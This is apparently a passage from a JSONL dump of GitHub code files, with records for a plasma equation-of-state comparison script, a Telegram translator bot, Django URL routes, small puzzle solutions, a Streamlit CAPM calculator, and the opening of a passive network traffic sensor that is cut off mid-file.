'Anum' : 'Anum',\n 'Xnum' : 'Xnum',\n 'Anum_prp': 'Anum_prp',\n 'groups' : 'groups',\n 'Zsymb' : 'Zsymb',\n 'BulkMod' : 'BulkMod',\n 'ElemNum' : 'ElemNum',\n 'Abar' : 'Abar',\n 'Zmax' : 'Zmax'}\n\n multi_names_dict = {'idens':'idens',\n 'temp':'temp',\n 'dens':'dens',\n 'Zf_DT':'zbar',\n 'opp_mg':'opp_mg',\n 'opr_mg':'opr_mg',\n 'Znum':'Znum',\n 'Anum':'Anum',\n 'Xnum':'Xnum',\n 'groups':'groups',\n 'Abar':'Abar',\n 'Zmax':'Zmax',\n 'emp_mg':'emp_mg'}\n\n sesame_names_dict = {'idens':'idens',\n 'temp':'ele_temps',\n 'dens':'ele_dens',\n 'Zf_DT':'zbar',\n 'Ut_DT':'total_eint',\n 'Uec_DT':'ele_eint',\n 'Ui_DT':'ioncc_eint',\n 'Pi_DT':'ioncc_pres',\n 'Pec_DT':'ele_pres',\n 'Znum':'Znum',\n 'Xnum':'Xnum',\n 'BulkMod':'bulkmod',\n 'Abar':'abar',\n 'Zmax':'zmax'}\n\n\n sesame_qeos_names_dict = {'idens' : 'idens',\n 'temp' : 'ele_temps',\n 'dens' : 'ele_dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'total_eint',\n 'Uec_DT' : 'ele_eint',\n 'Ui_DT' : 'ion_eint',\n 'Pi_DT' : 'ion_pres',\n 'Pec_DT' : 'ele_pres',\n 'Znum' : 'Znum',\n 'Xnum' : 'Xnum',\n 'BulkMod' : 'bulkmod',\n 'Abar' : 'abar',\n 'Zmax' : 'zmax'}\n\n\n ionmix_names_dict = {'Znum' : 'zvals',\n 'Xnum' : 'fracs',\n 'idens' : 'numDens',\n 'temp' : 'temps',\n 'Zf_DT' : 'zbar',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'Ui_DT' : 'eion',\n 'Uec_DT' : 'eele',\n 'groups' : 'opac_bounds',\n 'opr_mg' : 'rosseland',\n 'opp_mg' : 'planck_absorb',\n 'emp_mg' : 'planck_emiss'}\n\n # Inverted names: Convert format keys -> \"common dictionary style\" keys\n propaceos_names_dict_inv = {v:k for k, v\n in propaceos_names_dict.items()}\n multi_names_dict_inv = {v:k for k, v\n in multi_names_dict.items()}\n sesame_names_dict_inv = {v:k for k, v\n in sesame_names_dict.items()}\n sesame_qeos_names_dict_inv = {v:k for k, v\n in sesame_qeos_names_dict.items()}\n ionmix_names_dict_inv = {v:k for k, v\n in ionmix_names_dict.items()}\n\n def __init__(self, form, basedir, basename, path_in,\n mpi=None, znum=None, xnum=None,\n filters=[0.,0.], verbose=False, tabnum=None):\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Set attributes.\n self.form = form\n self.basedir = basedir\n self.basename = basename\n self.path_in = path_in\n self.mpi = mpi\n self.znum = znum\n self.filters = filters\n self.verbose = verbose\n self.xnum = xnum\n self.tabnum = tabnum\n\n # For SESAME, we need the hedp package to calculate zbar.\n need_hedp_list = ['sesame', 'sesame-qeos']\n if self.form in need_hedp_list:\n try:\n global hedp\n import hedp.eos\n except ImportError:\n raise ImportError('You need the hedp module. You can get it here: '\n 'https://github.com/luli/hedp.')\n\n # Use handle_dict to create the eos_dict based on the input format.\n try:\n self.data = self.handle_dict[self.form]()\n self.ft = self.form\n except KeyError:\n raise KeyError('{} is not a valid format name!'.format(self.form))\n\n def set_handle_dict(self):\n self.handle_dict = {'propaceos' : self.propaceos_read,\n 'multi' : self.multi_read,\n 'sesame' : self.sesame_read,\n 'sesame-qeos' : self.sesame_qeos_read,\n 'ionmix' : self.ionmix_read}\n\n def propaceos_read(self):\n # If we are unable to find the correct script for opg_propaceos\n # we need to let the user know.\n try:\n import opacplot2.opg_propaceos\n op = opp.opg_propaceos.OpgPropaceosAscii(self.path_in)\n self.common_keys = [self.propaceos_names_dict_inv[key]\n for key in op.keys()\n if key in self.propaceos_names_dict_inv.keys()]\n return op\n except ImportError:\n raise ImportError('You do not have the opg_propaceos script.')\n\n def multi_read(self):\n op = opp.OpgMulti.open_file(self.basedir, self.basename)\n\n # Decide if we need Znum, and Xnum, calculate Anum if it is not given.\n if self.znum is None:\n if 'Znum' in op:\n self.znum = op['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n if type(self.znum) is int:\n self.znum = [self.znum]\n op['Znum'] = np.array(self.znum, dtype='int')\n op['Anum'] = np.array([ptab.elements[el].mass for el in op['Znum']])\n if self.xnum is None:\n if len(self.znum) == 1:\n op['Xnum'] = np.array([1.0])\n else:\n raise ValueError('Xnum array should be provided')\n else:\n op['Xnum'] = np.array(Xnum)\n\n # Setting more attributes.\n op['Abar'] = np.sum(op['Xnum']*op['Anum'])\n op['Zmax'] = np.sum(op['Xnum']*op['Znum'])\n op['idens'] = op['dens']*opp.NA/op['Abar']\n self.common_keys = [self.multi_names_dict_inv[key]\n for key in op.keys()\n if key in self.multi_names_dict_inv.keys()]\n return op\n\n def sesame_read(self):\n # TODO Add options for single vs double\n if self.verbose:\n print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n # Try SINGLE precision and then DOUBLE if that doesn't work.\n try:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n except ValueError:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n \n # If there is more than one table, fail. Use sesame-extract\n # to create a one-table file.\n if len(op.data.keys()) > 1:\n raise Warning('More than one material ID found. '\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n \n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n if self.verbose:\n print('Setting the atomic numbers...')\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ioncc'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=False)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_names_dict_inv.keys()]\n\n return op\n\n def sesame_qeos_read(self):\n raise Warning('QEOS-SESAME is not ready yet!')\n\n if self.verbose:\n print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n # Try SINGLE precision and then DOUBLE if that doesn't work.\n try:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n except ValueError:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n if len(op.data.keys()) > 1:\n raise Warning('More than one material ID found. '\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n\n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ion'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=True)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_qeos_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_qeos_names_dict_inv.keys()]\n\n return op\n\n def ionmix_read(self):\n if self.verbose:\n print('Opening up IONMIX file {}...'.format(self.path_in))\n if self.mpi is None:\n raise Warning('Need mpi for ionmix!')\n else:\n # TODO Add options for man and twot\n op = opp.OpacIonmix(self.path_in, self.mpi, man=True, twot=True)\n self.common_keys = [self.ionmix_names_dict_inv[attr]\n for attr in dir(op)\n if attr in self.ionmix_names_dict_inv.keys()]\n return op\n\nclass get_eos_array(object):\n \"\"\"\n Gets an EoS array based on the input opacplot2 object.\n \"\"\"\n def __init__(self, eos, arr):\n\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Use handle_dict to create the eos_dict based on the input format.\n try:\n self.arr = self.handle_dict[eos.ft](eos, arr)\n # TODO fix this, error handling is not useful since key erros come\n # from everywhere in this class.\n except KeyError:\n raise KeyError('{} is not a valid format name!'.format(eos.ft))\n\n def set_handle_dict(self):\n self.handle_dict = {'propaceos' : self.propaceos,\n 'multi' : self.multi,\n 'sesame' : self.sesame,\n 'sesame-qeos' : self.sesame_qeos,\n 'ionmix' : self.ionmix}\n\n def propaceos(self, eos, arr):\n return eos.data[Formats_Read.propaceos_names_dict[arr]]\n\n def multi(self, eos, arr):\n return eos.data[Formats_Read.multi_names_dict[arr]]\n\n def sesame(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n data_dict = eos.data.data[table_key]\n return data_dict[Formats_Read.sesame_names_dict[arr]]\n\n def sesame_qeos(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n data_dict = eos.data.data[table_key]\n return data_dict[Formats_Read.sesame_qeos_names_dict[arr]]\n\n def ionmix(self, eos, arr):\n return getattr(eos.data, Formats_Read.ionmix_names_dict[arr])\n\ndef compare_eos(eos_1, eos_2, verbose=False,\n plot=False,\n write_log_file=False,\n lin_grid=False):\n\n logfile_name = 'eos_errors.txt'\n\n # Union of all \"common dictionary format\" keys to do a full error report.\n # Not including 'idens', 'dens', 'temp', 'groups', 'opp_mg', 'opp_int',\n # 'opr_int', 'emp_mg', 'opr_mg', 'emp_int', 'Abar','Zmax', 'Ut_DT',\n # 'Znum', 'BulkMod', 'Xnum', 'Anum', 'Zsymb', 'ElemNum', 'Anum_prp'.\n # (aka no opacity data currently).\n # TODO add opacity comparison capabilities.\n keys = ['Pec_DT', 'Zf_DT', 'Pi_DT', 'Uec_DT', 'Ui_DT']\n\n shared_keys = [key for key in keys\n if key in eos_1.common_keys\n and key in eos_2.common_keys]\n\n if verbose:\n err_report_str = 'Performing error report on:\\n'\n for i in range(len(shared_keys)):\n err_report_str += '{}. {}\\n'.format((i+1), shared_keys[i])\n print(err_report_str)\n\n # Perform error report using number densities.\n error_report = []\n\n # Freak out if there is no number density.\n if 'idens' not in eos_1.common_keys or 'idens' not in eos_2.common_keys:\n raise Warning('No number density data!')\n\n # Get the temperature and density arrays.\n dens_1 = get_eos_array(eos_1, 'idens').arr\n temp_1 = get_eos_array(eos_1, 'temp').arr\n dens_2 = get_eos_array(eos_2, 'idens').arr\n temp_2 = get_eos_array(eos_2, 'temp').arr\n\n # These will be used for the interpolator function `griddata`.\n d_interp_1, t_interp_1 = np.meshgrid(dens_1, temp_1)\n d_interp_2, t_interp_2 = np.meshgrid(dens_2, temp_2)\n\n # Creating a new grid to interpolate onto.\n d = opp.utils.intersect_1D_sorted_arr(dens_1, dens_2)\n t = opp.utils.intersect_1D_sorted_arr(temp_1, temp_2)\n D_new, T_new = np.meshgrid(d,t)\n\n # These will be used for the interpolator function `griddata`.\n d_interp_1, t_interp_1 = np.meshgrid(dens_1, temp_1)\n d_interp_2, t_interp_2 = np.meshgrid(dens_2, temp_2)\n\n if (d is None) or (t is None):\n raise Warning('Density and temperature arrays must have some overlap!')\n if verbose:\n print('Density range: {:.5E} to {:.5E} #/cm^3.'.format(d[0], d[-1]))\n print('Temperature range: {:.5E} to {:.5E} eV.'.format(t[0], t[-1]))\n print('Generating error report...')\n\n fn_1 = os.path.split(eos_1.path_in)[1]\n fn_2 = os.path.split(eos_2.path_in)[1]\n\n if write_log_file:\n # Append heading for our current grid.\n with open(logfile_name, 'a') as f:\n f.write('Files: {}, {}\\n'.format(fn_1, fn_2))\n f.write('[Array, RMS Error, Absolute Error]\\n')\n\n # Do analysis on each of the shared keys.\n for key in shared_keys:\n # Get the data.\n data_1 = get_eos_array(eos_1, key).arr\n data_2 = get_eos_array(eos_2, key).arr\n\n # Use interpolation to account for mismatched grid sizes.\n # `rescale=True` to account for the orders of magnitude difference\n # in the dens/temp grids.\n # `scipy.interpolate.interp2d` was not giving accurate interpolation.\n # I believe this is due to the orders of magnitude difference also,\n # which `griddata` can easily fix. - JT\n # Additionally, `griddata` is much faster than using an interpolator\n # function to fill an empty grid.\n interp_data_1 = sp.interpolate.griddata(\n (d_interp_1.flatten(), t_interp_1.flatten()),\n data_1.T.flatten(),\n (D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n interp_data_2 = sp.interpolate.griddata(\n (d_interp_2.flatten(), t_interp_2.flatten()),\n data_2.T.flatten(),(D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n\n interp_data_1 = interp_data_1.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_2 = interp_data_2.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_1 = interp_data_1.T\n interp_data_2 = interp_data_2.T\n\n err_1_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_1)\n err_2_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_2)\n\n err_1_rms = np.sqrt(err_1_sqr.mean())\n err_2_rms = np.sqrt(err_2_sqr.mean())\n err_rms = max(err_1_rms, err_2_rms)\n\n err_1_abs = np.sqrt(np.max(err_1_sqr))\n err_2_abs = np.sqrt(np.max(err_2_sqr))\n err_abs = max(err_1_abs, err_2_abs)\n\n fmt='%.0f %%'\n if plot:\n titles = {'Zf_DT':'Average Ionization',\n 'Pec_DT':'Electron Pressure',\n 'Pi_DT':'Ion Pressure',\n 'Uec_DT':'Electron Energy',\n 'Ui_DT':'Ion Energy'}\n\n fig, axarr = plt.subplots(1,3)\n x, y = np.meshgrid(d, t)\n res_levels = {0:.1, 1:.01, 2:.0001 }\n fig.set_size_inches(21, 6)\n\n for i in range(3):\n levels = np.linspace(0, res_levels[i], 256)\n cs = axarr[i].contourf(x, y, np.sqrt(err_1_sqr).T,\n levels, extend='max')\n cb = plt.colorbar(cs, ax=axarr[i])\n cb.formatter = matplotlib.ticker.FuncFormatter(lambda x,p: '{:.1e}%'.format(float(x)*100))\n cb.update_ticks()\n if i==2:\n cb.set_label('% Error')\n if not lin_grid:\n axarr[i].loglog()\n axarr[i].set_xlim((d[0], d[-1]))\n axarr[i].set_ylim((t[0], t[-1]))\n axarr[i].set_xlabel('rho [#/cm^(3)]')\n axarr[i].set_ylabel('T [eV]')\n\n fig.tight_layout()\n fig.suptitle('{} % Error for {} vs. {}'.format(titles[key], fn_1, fn_2))\n fig.subplots_adjust(top=0.85)\n fig.savefig('{}.png'.format(key+'_err'))\n\n if write_log_file:\n with open(logfile_name, 'a') as f:\n f.write('{}, {}, {}\\n'.format(key, err_rms, err_abs))\n\n print('Error statistics for {}:'.format(key))\n print('RMS % Error: {:.5e}.'.format(err_rms*100))\n print('Max % Absolute Error: {:.5e}.'.format(err_abs*100))\n\ndef check_error():\n input_data = get_input_data()\n\n if input_data['args'].filetypes is None:\n read_format_ext(input_data['args'],\n input_data['fn_1'],\n input_data['fn_2'])\n\n eos_1 = Formats_Read(input_data['args'].filetypes[0],\n input_data['basedir_1'],\n input_data['basename_1'],\n input_data['path_in_1'],\n mpi=input_data['args'].mpi_1,\n znum=input_data['args'].Znum_1,\n xnum=input_data['args'].Xfracs_1,\n filters=input_data['args'].filters_1,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_1)\n\n eos_2 = Formats_Read(input_data['args'].filetypes[1],\n input_data['basedir_2'],\n input_data['basename_2'],\n input_data['path_in_2'],\n mpi=input_data['args'].mpi_2,\n znum=input_data['args'].Znum_2,\n xnum=input_data['args'].Xfracs_2,\n filters=input_data['args'].filters_2,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_2)\n\n compare_eos(eos_1, eos_2, verbose=input_data['args'].verbose,\n plot=input_data['args'].plot,\n write_log_file=input_data['args'].writelog,\n lin_grid=input_data['args'].lin_grid)\n\nif __name__=='__main__':\n check_error()\n","repo_name":"flash-center/opacplot2","sub_path":"opacplot2/scripts/opac_error.py","file_name":"opac_error.py","file_ext":"py","file_size_in_byte":32047,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"}
+{"seq_id":"46059533428","text":"# Get token of telegram chat bot\nfile = open(\"Telegram_chatbot_token.txt\",\"r\")\nToken = file.read()\n\nCallBot = \"No\"\nAskBot = \"No\"\nBotAsk = \"No\"\nChat_id = None\n\nfrom telegram.ext import Updater,CommandHandler,MessageHandler,Filters\nfrom Translator import translatorAI\n\ndef main():\n # Updater update from telegram and push it to Dispatcher\n updater = Updater(Token)\n\n # Link updater with dispatcher\n dispatcher = updater.dispatcher\n print(\"Bot start\")\n\n # Add command handle vs message handle\n start_handler = CommandHandler(['Ronet','hi'],start)\n translate_handler = CommandHandler('translate',translate)\n Message_handler = MessageHandler(Filters.text,sendMessage)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(translate_handler)\n dispatcher.add_handler(Message_handler)\n\n # Start chatbot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n# Handle start command\ndef start(bot, update):\n update.message.reply_text(\"Hi, I am translator bot !\")\n print(update.message.chat.id)\n\n# Handle command translate\ndef translate(bot,update):\n string=update.message.text[11:]\n update.message.reply_text(\"It may take some minutes ...\")\n update.message.reply_text(\"Translate: \\n\"+translatorAI(string))\n\n# Handler conversation with both \ndef sendMessage(bot,update):\n # Define global var for state of conversation\n global AskBot, CallBot, BotAsk, Chat_id\n\n # put message received onto analyze\n String = update.message.text\n List = String.split(' ')\n\n # Try to make bot deploy on single conversation\n if Chat_id == update.message.chat_id or Chat_id is None:\n\n # state 1: bot ask usr for conversation\n if CallBot == \"No\" and AskBot == \"No\" and BotAsk == \"No\":\n for name in List:\n if name == \"@ronet20190310_bot\":\n Chat_id = update.message.chat_id\n bot.sendMessage(Chat_id,\"Do you call me ?\")\n BotAsk = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 2: usr confirm conversation\n elif BotAsk == \"Yes\" and CallBot == \"No\" and AskBot == \"No\":\n for name in List:\n if name == \"yes\" or name == \"Yes\":\n bot.sendMessage(Chat_id,\"What do you want ?\")\n CallBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n # state 3: usr ask bot for function\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"No\":\n for name in List:\n if name == \"translate\" or name == \"Translate\":\n bot.sendMessage(Chat_id,\"Enter text you want to translate !\")\n AskBot = \"Yes\"\n return\n bot.sendMessage(Chat_id,\"This feature not yet update on me, sorry\\n This conversation close\") \n BotAsk = CallBot = AskBot =\"No\"\n Chat_id = None\n\n # state 4: bot answer usr\n elif BotAsk == \"Yes\" and CallBot == \"Yes\" and AskBot == \"Yes\":\n bot.sendMessage(Chat_id,\"Please waiting for translation ...\")\n bot.sendMessage(Chat_id,translatorAI(String))\n bot.sendMessage(Chat_id,\"This conversation close\")\n BotAsk = CallBot = AskBot = \"No\"\n Chat_id = None\n\n else:\n bot.sendMessage(update.message.chat_id,\"Bot is busy now\")\n \n# Main runnning function\nif __name__ == '__main__':\n main()\n","repo_name":"larycoder/chatbots","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"30762178618","text":"from django.urls import path\nfrom ecommerce.views import user_views as views\n\nurlpatterns = [\n # using the custom token view that has custom user data\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('register/', views.registerUser, name=\"register\"),\n path('profile/', views.getUser, name=\"users-profile\"),\n path('profile/update/', views.updateUser, name=\"users-profile-update\"),\n path('', views.getUsers, name=\"users\"),\n\n]","repo_name":"Jacob-Hoff-man/django-ecommerce","sub_path":"django-ecommerce/ecommerce/urls/user_urls.py","file_name":"user_urls.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40749180213","text":"from actions.evaluate import evaluate\n\n\ndef loseLife(game, source, player, amountToLose):\n \"\"\"Set the life total for selected player to (current life - the amount to lose)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life loss\n player (Player): Player that is loosing life\n amountToLose (Int): The amount of life to lose\n\n Returns:\n None\n \"\"\"\n if amountToLose == 0:\n return\n player.lifeTotal -= amountToLose\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef gainLife(game, source, player, amountToGain):\n \"\"\"Set the life total for selected player to (current life + the amount to gain)\n\n Args:\n game (Game): Game Object\n source (Card): Source of the life gain\n player (Player): Player that is gaining life\n amountToGain (Int): The amount of life to gain\n\n Returns:\n None\n \"\"\"\n if amountToGain == 0:\n return\n\n player.lifeTotal += amountToGain\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef setLife(game, source, player, newTotal):\n \"\"\"Sets the life total of the selected player to the specified amount\n\n Args:\n game (Game): Game Object\n source (Object): Source that is setting the player's life total\n player (Player): Player is having their life total set\n newTotal (Int): New life total\n\n Returns:\n None\n \"\"\"\n if player.getLife() == newTotal:\n pass\n elif (player.getLife() > newTotal):\n evaluate(game, loseLife, source=source, player=player, amountToLose=(player.getLife() - newTotal))\n else:\n evaluate(game, gainLife, source=source, player=player, amountToGain=(newTotal - player.getLife()))\n","repo_name":"0xBC9/Cardname-Server","sub_path":"engine/actions/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"71153841325","text":"def plastic_balance(lst):\n on = True\n while on:\n if len(lst) == 1:\n if lst[0] + lst[0] != 0:\n return []\n else: \n return lst\n if lst == []:\n return []\n if lst[0] + lst[-1] != sum(lst[1:-1]):\n del lst[0]\n del lst[-1]\n continue\n if lst[0] + lst[-1] == sum(lst[1:-1]):\n return lst\n \n\n\nprint(plastic_balance([0,104,3,101,0,111]))","repo_name":"DovydasMen/codewars","sub_path":"plastci_balance.py","file_name":"plastci_balance.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37194912727","text":"#BOJ 1978 - 소수 찾기\n\nimport sys\nfrom collections import deque\nimport math\ninput = sys.stdin.readline\n\nT = int(input())\narr = list(map(int, input().split()))\ncnt = 0\n\ndef prime(_n):\n if _n < 2:\n return False\n for i in range(2, int(math.sqrt(_n))+1):\n if _n % i == 0:\n return False\n return True\n\nfor i in range(T):\n if prime(arr[i]):\n cnt += 1\n\nprint(cnt)\n","repo_name":"underflow101/BOJ_solve","sub_path":"1978 - 소수 찾기/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"44330097553","text":"# importing libraries\nimport streamlit as st\nimport datetime\nimport pandas_datareader.data as web\nimport yfinance as yf\nimport pandas as pd\nimport capm_functions\nimport numpy as np\nimport plotly.express as px\n\n# setting page config\nst.set_page_config(\n\n page_title=\"CAPM\",\n page_icon=\"chart_with_upwards_trend\",\n layout=\"wide\",\n )\n\nst.title('Calculate Beta and Return for individual stock')\n\n# getting input from user\ncol1, col2 = st.columns([1,1])\nwith col1:\n stock = st.selectbox(\"Choose a stock\" , ('TSLA', 'AAPL','NFLX','MGM','MSFT','AMZN','NVDA','GOOGL'))\nwith col2:\n year = st.number_input(\"Number of Years\",1,10)\n\n# downloading data for SP500\nend = datetime.date.today()\nstart = datetime.date(datetime.date.today().year - year, datetime.date.today().month, datetime.date.today().day)\nSP500 = web.DataReader(['sp500'], 'fred', start, end)\n\n# downloading data for the stock\nstocks_df = yf.download(stock, period = f'{year}y')\nstocks_df = stocks_df[['Close']]\nstocks_df.columns = [f'{stock}']\nstocks_df.reset_index(inplace = True)\nSP500.reset_index(inplace = True)\nSP500.columns = ['Date','sp500']\nstocks_df['Date'] = stocks_df['Date'].astype('datetime64[ns]')\nstocks_df['Date'] = stocks_df['Date'].apply(lambda x:str(x)[:10])\nstocks_df['Date'] = pd.to_datetime(stocks_df['Date'])\nstocks_df = pd.merge(stocks_df, SP500, on = 'Date', how = 'inner')\n\n# calculating daily return \nstocks_daily_return = capm_functions.daily_return(stocks_df)\nrm = stocks_daily_return['sp500'].mean()*252\n\n# calculate beta and alpha\nbeta, alpha = capm_functions.calculate_beta(stocks_daily_return, stock)\n\n# risk free rate of return\nrf = 0\n\n# market potfolio return\nrm = stocks_daily_return['sp500'].mean()*252\n\n# calculate return\nreturn_value = round(rf+(beta*(rm-rf)),2)\n\n# showing results\nst.markdown(f'### Beta : {beta}')\nst.markdown(f'### Return : {return_value}')\nfig = px.scatter(stocks_daily_return, x = 'sp500', y = stock, title = stock)\nfig.add_scatter(x = stocks_daily_return['sp500'], y = beta*stocks_daily_return['sp500'] + alpha, line=dict(color=\"crimson\"))\nst.plotly_chart(fig, use_container_width=True)","repo_name":"mdaamir6870/Capital-Asset-Pricing-Model","sub_path":"pages/Calculate_Beta.py","file_name":"Calculate_Beta.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"3404031271","text":"#-*- coding:utf-8 -*-\n\nfrom lib._http_tcp_shark import tcp_http_shark\nfrom lib._http_tcp_pcap import tcp_http_pcap\nfrom lib._util import check_lock\nfrom lib._util import _syslog_msg_send, _http_msg_send, _tcp_msg_send\nimport getopt\nimport sys\nimport os\nimport threading\n# import queue\nimport collections\nimport signal\nimport traceback\nimport time\n\n# 数据接收服务器地址和端口信息\nserver_ip = '127.0.0.1'\nserver_port = 514\n# 监听网卡\ninterface = 'eth0'\n# 主机标识\ncustom_tag = '127.0.0.1'\n# bpf_filter\nbpf_filter = 'tcp'\n# display_filter\ndisplay_filter = 'tcp'\n# debug模式,数据console输出\ndebug = False\n# chunked/gzip数据分析,对性能压力较大\nreturn_deep_info = False\n# 重复缓存数量\ncache_size = 4096\n# 流量会话数量\nsession_size = 4096\n# tshark定期清空内存(单位秒/默认一小时),pcap接收数据包的超时时间(单位毫秒/默认3.6秒)\ntimeout = 3600\n# 发送数据线程数量\nmsg_send_thread_num = 2\n# 发送数据队列最大值\nmax_queue_size = 50000\n# 资产数据发送模式,仅支持TCP,HTTP,SYSLOG三种\nmsg_send_mode = 'TCP'\n# 流量采集引擎,仅支持TSHARK,PCAP两种\nengine = \"PCAP\"\n# pcap采集数据类型控制,TCP,HTTP\npcap_collection_data = 'TCP/HTTP'\n\n# HTTP数据过滤\nhttp_filter = {\n\t\"response_code\": ['304', '400', '404'],\n\t\"content_type\": [\n\t\t'audio/',\n\t\t'video/',\n\t\t'image/',\n\t\t'font/',\n\t\t'application/pdf',\n\t\t'application/msword',\n\t\t'application/javascript',\n\t\t'text/javascript',\n\t\t'text/css'\n\t]\n}\n\ndef Usage():\n\tprint('''\n ###################################################################\n # passets-sensor 1.0.0 #\n ###################################################################\n -------------------------------------------------------------------\n Usage:\n python3 main.py [options] ...\n\n -i Name or idx of interface(def: None)\t\t \n -s server ip(def: None)\n -p server port(def: None)\n -t Source identification(def: localhost)\n -c Cache size(def: 1024)\n -S Session size(def: 1024)\n -T Memory clear time(def: 3600 sec)\n -d Debug information switch(def: off)\n -------------------------------------------------------------------\n\t''')\n\tsys.exit()\n\ndef tshark_analysis(work_queue):\n\n\tshark_obj = tcp_http_shark(work_queue, interface, 